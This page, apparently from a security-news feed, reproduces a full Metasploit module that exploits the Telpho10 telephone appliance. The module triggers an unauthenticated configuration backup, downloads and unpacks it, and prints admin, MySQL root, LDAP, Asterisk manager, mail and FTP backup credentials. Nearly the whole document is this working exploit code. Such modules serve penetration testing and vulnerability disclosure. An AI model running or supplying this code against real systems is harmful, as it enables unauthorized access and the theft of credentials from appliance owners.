Security
Headlines
HeadlinesLatestCVEs

Headline

Telpho10 Backup Credentials Dumper

This Metasploit module exploits a vulnerability present in all versions of Telpho10 telephone system appliance. This Metasploit module generates a configuration backup of Telpho10, downloads the file and dumps the credentials for admin login, phpmyadmin, phpldapadmin, etc. This Metasploit module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.

Packet Storm
#sql#vulnerability#linux#git#php#ldap#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Telpho10 Backup Credentials Dumper',        'Description' => %q{          This module exploits a vulnerability present in all versions of Telpho10 telephone system          appliance. This module generates a configuration backup of Telpho10,          downloads the file and dumps the credentials for admin login,          phpmyadmin, phpldapadmin, etc.          This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.        },        'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module        'License' => MSF_LICENSE,        'References' => ['URL', 'https://github.com/whoot/TelpOWN'],        'Platform' => 'linux',        'Privileged' => false,        'DisclosureDate' => '2016-09-02'      )    )    register_options(      [        Opt::RPORT(80)      ]    )  end  # Used for unpacking backup files  def untar(tarfile)    destination = tarfile.split('.tar').first    FileUtils.mkdir_p(destination)    File.open(tarfile, 'rb') do |file|      Rex::Tar::Reader.new(file) do |tar|        tar.each do |entry|          dest = File.join(destination, File.basename(entry.full_name))          next unless entry.file?          File.open(dest, 'wb') do |f|            f.write(entry.read)          end          File.chmod(entry.header.mode, dest)        end      end    end    return destination  end  # search for credentials in backup file  def dump_creds(mysql_file)    file = File.new(mysql_file, 'r')    while (line = file.gets)      if line.include? 'adminusername'        config = [line]      end    end    file.close    print_status('Login (/telpho/login.php)')    print_status('-------------------------')    print_good("Username: #{config.first[/adminusername','(.*?)'/, 1]}")    print_good("Password: #{config.first[/adminpassword','(.*?)'/, 1]}\n")    print_status('MySQL (/phpmyadmin)')    print_status('-------------------')    print_good('Username: root')    print_good("Password: #{config.first[/dbpassword','(.*?)'/, 1]}\n")    print_status('LDAP (/phpldapadmin)')    print_status('--------------------')    print_good('Username: cn=admin,dc=localdomain')    print_good("Password: #{config.first[/ldappassword','(.*?)'/, 1]}\n")    print_status('Asterisk MI (port 5038)')    print_status('-----------------------')    print_good("Username: #{config.first[/manageruser','(.*?)'/, 1]}")    print_good("Password: #{config.first[/managersecret','(.*?)'/, 1]}\n")    print_status('Mail configuration')    print_status('------------------')    print_good("Mailserver: #{config.first[/ipsmarthost','(.*?)'/, 1]}")    print_good("Username:   #{config.first[/mailusername','(.*?)'/, 1]}")    print_good("Password:   #{config.first[/mailpassword','(.*?)'/, 1]}")    print_good("Mail from:  #{config.first[/mailfrom','(.*?)'/, 1]}\n")    print_status('Online Backup')    print_status('-------------')    print_good("ID:       #{config.first[/ftpbackupid','(.*?)'/, 1]}")    print_good("Password: #{config.first[/ftpbackuppw','(.*?)'/, 1]}\n")  end  def run    res = send_request_cgi({      'uri' => '/telpho/system/backup.php',      'method' => 'GET'    })    if res && res.code == 200      print_status('Generating backup')      sleep(1)    else      print_error('Could not find vulnerable script. Aborting.')      return nil    end    print_status('Downloading backup')    res = send_request_cgi({      'uri' => '/telpho/temp/telpho10.epb',      'method' => 'GET'    })    if res && res.code == 200      if res.body.to_s.bytesize == 0        print_error('0 bytes returned, file does not exist or is empty.')        return nil      end      path = store_loot(        'telpho10.backup',        'application/x-compressed',        datastore['RHOST'],        res.body,        'backup.tar'      )      print_good("File saved in: #{path}")      begin        extracted = untar(path.to_s)        mysql = untar("#{extracted}/mysql.tar")      rescue StandardError        print_error('Could not unpack files.')        return nil      end      begin        print_status("Dumping credentials\n")        dump_creds("#{mysql}/mysql.epb")      rescue StandardError        print_error('Could not find credential file.')        return nil      end    else      print_error('Failed to download backup file.')      return nil    end  rescue ::Rex::ConnectionError    print_error("#{rhost}:#{rport} - Failed to connect")    return nil  endend

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution